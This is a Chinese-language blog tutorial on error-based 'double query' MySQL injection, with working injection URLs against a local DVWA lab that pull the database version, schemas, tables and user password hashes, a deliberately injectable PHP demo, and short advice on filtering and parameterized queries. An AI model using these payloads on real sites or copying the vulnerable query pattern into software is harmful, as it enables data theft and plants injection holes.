双注入查询

最新推荐文章于 2024-07-04 18:58:13 发布

原创最新推荐文章于 2024-07-04 18:58:13 发布 · 1.4k 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#sql注入

脚本漏洞专栏收录该内容

2 篇文章

订阅专栏

拿之前写过的一篇文章，修改发表，主要讲的是双注入查询

这种方面试用于注入的时候没有返回位，但是有返回位的时候也适用，不过又返回位的时候就不建议在、用这个啦！返回位就是你们union select 1,2,3,4,5,6,7,8 这里是8个字段

这里显示2,4,5,6,7,8就是返回位啦

另外，就是要有返回mysql错误提示，php返回错误提示有两种,看下图

这是mysql返回的错误

这是php返回的错误

floor()和rand()，count()就不在多说啦

但是concat()函数，就来说一下，一个连接函数，可以连接多个字符，

例如concat("abc","123")="abc123"

并且支持ascll码,例如：concat("abc",0x22,"123")=abc"123，0x22就是双引号,可以用来当分隔符

这里在mysql输入select concat((select version))

在concat里执行查询要用括号括起来，同时要确定只返回一条数据，不然得用limit来保证只有一条结果（limit 0,1 返回第一条）

如果这条语句添加from的话，就会返回表中的记录的条数，就是有多少条记录就会返回多少次的版本号，看图

这里还没有显示完！！

因此select concat((select version()),floor(rand()*2)) from user;(这里我用的是mysql中的mysql数据库，user表有四条记录）

Attention，这里显示的值是版本号加上rand()生成的，正确版本好是去掉后面的0或1

现在我们加上group by ，因为如果我们从from 某张表的话，可能里面就会有很多挑记录，然后就可能生成随机值（据说是这样的，如果不是，还望告知）

这里用information_schema.tables来弄，因为他的记录够多，如前一条语句，你就可以知道啦

group by 一下多清爽啦

看语句中 select concat((select version()),floor(rand()*2))a from information_schema.tables group by a;

这里加红的a是把 as a 简写成 a 而已，说一下group by ，这个的作用就是把5.1.69-0ubuntu0.10.04.10 分为一组，5.1.69-0ubuntu0.10.04.11 的分为一组

最后就来到这个count()函数了，这个函数妙用可以看一下下图

看到了没有，返回了我们后面concat的内容啦

ERROR 1062 (23000): Duplicate entry '15.1.69-0ubuntu0.10.04.1' for key 'group_key

说了这么多就为了这个而已！！

好了，给个小小demo给你们，不过弄不出一个没有显示返回位的，所以就将就一下的

源代码后面再给你们

然后双注入查询是有固定公式的

union select 1 from (select+count(*),concat(floor(rand(0)*2),( 注入爆数据语句))a from information_schema.tables group by a)b

这里小小弄一下看看

这是正常的情况（强调一下，这里只是为了演示双注入查询而已，脚本能力有限，所以就没有写没有返回位的demo啦，小菜一枚，大神勿喷）：

加个单引号后

这里说明有注入了，然后用order by 判断字段咯，这里就截图了（太麻烦啦），字段数是8个（其实不判断也可以的，只要确定有注入就行啦）

先读个数据库的版本，用户，当前库名

http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b

这里数据库版本：5.1.28-rc-community

用户是：root@localhost

数据库名：test

然后读数据库有哪些库!

http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select schema_name from information_schema.schemata limit 0,1))a from information_schema.tables group by a)b

这里要注意，因为标红的语句会返回多条记录，所以要用limit来限制返回的条数，limit 0,1是第一条记录

limit 1,1是第二条记录

因为我有个dvwa的数据库，所以就用那个来做示范啦

http://127.0.0.1/yi.php?id=-1 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1))a from information_schema.tables group by a)b

标红是dvwa的hex值，这样得到dvwa的users的表

然后看有什么字段

http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*) ,concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name =0x7573657273 limit 0,1 ))a from information_schema.tables group by a)b

然后修改limit的值，得到字段user,password

然后读取字段的值

http://127.0.0.1/yi.php?id=-1 union Select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user,0x22,password) from dvwa.users limit 0,1))a from information_schema.tables group by a)b

这样子就得到字段的值啦，然后加红的标记是为了提醒一下，要是垮库读取数据，要写成数据库名然后.表名。因为当前数据库是test，然后我读的是dvwa库的users的表，所以要写成dvwa.users

好了基本就是这么多拉

最后说一下如何防范sql注入，

一个是过滤啦（把',",union,select load_file,%,and等敏感字符都过滤啦）

另一个是参数化查询

就是一种把查询语句给固定死了，无论传过来的值是什么，都只当做变量来执行查询语句

by Exp_10it

本文部分内容来自网络，但是链接找不到啦

demo的源码

<?php 
	$dbuser = "root";
	$dbpwd = "";     //这里是mysql的密码
	$db = "test";
	$conn = mysql_connect("localhost",$dbuser,$dbpwd) or die("error");
	mysql_select_db($db,$conn);

	$id = $_GET['id'];
	$query = "select * from test where id =$id";
	$result = mysql_query($query) or die(mysql_error());
	print_r(mysql_fetch_array($result));
        //简单的写一下而已
?>